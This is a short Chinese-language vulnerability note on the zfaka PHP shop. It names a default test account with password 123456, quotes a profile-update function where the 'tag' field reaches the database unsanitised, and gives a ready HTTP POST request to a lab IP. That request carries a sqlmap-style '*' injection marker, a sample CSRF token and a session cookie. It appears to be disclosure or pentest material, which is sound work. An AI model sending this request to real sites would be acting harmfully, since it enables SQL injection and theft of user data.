zfaka在安装的时候会新建一个测试帐号[email protected],密码123456
在文件application/modules/Member/controllers/Profiles.php,profilesajaxAction方法第53行附近存在注入
public function profilesajaxAction()
{
if ($this->login==FALSE AND !$this->userid) {
$data = array('code' => 1000, 'msg' => '请登录');
Helper::response($data);
}
$nickname = $this->getPost('nickname',false);
$qq = $this->getPost('qq',false);
$tag = $this->getPost('tag',false);
$csrf_token = $this->getPost('csrf_token', false);
$data = array();
if($nickname AND $csrf_token){
if ($this->VerifyCsrfToken($csrf_token)) {
$nickname_string = new \Safe\MyString($nickname);
$nickname = $nickname_string->trimall()->getValue();
$qq_string = new \Safe\MyString($qq);
$qq = $qq_string->trimall()->getValue();
$this->m_user->UpdateByID(array('nickname'=>$nickname,'qq'=>$qq,'tag'=>$tag),$this->userid);
$data = array('code' => 1, 'msg' => '更新成功');
} else {
$data = array('code' => 1001, 'msg' => '页面超时,请刷新页面后重试!');
}
}else{
$data = array('code' => 1000, 'msg' => '丢失参数');
}
Helper::response($data);
}
|
数据包
POST /member/profiles/profilesajax HTTP/1.1
Host: 10.100.100.139:84
Content-Length: 395
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.100.100.139:84
Referer: http://10.100.100.139:84/member/profiles
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8cune5mggdgu7dp036q722c0q
Connection: close
nickname=666777*&qq=43036456&tag=%E8%B5%84%E6%96%99%E7%A9%BA%E7%99%BD%E6%98%AF%E5%A4%A7%E5%B8%85%E9%94%85&csrf_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC96bGtiLm5ldCIsImF1ZCI6IlJQQyIsImV4cCI6MTYzMDM3OTU5NX0.EyrvVuN4mcHL_h8YXcKoq9XJ0H_cmcD5YainH2XPsCcMMdFZYAfPZxqzSc1ohkbiYxXeVcuGa0Rq_Ea0gyW_1qQuF0pVrjeOz4bRSTr6fI-dHn_wp4k4EKTgCAPpaVmqBgzAdmpyKuar_jlX-04vPfV1SPKe2hqojRjO9LGxBfw
|
需要注意的是csrf_token会过期
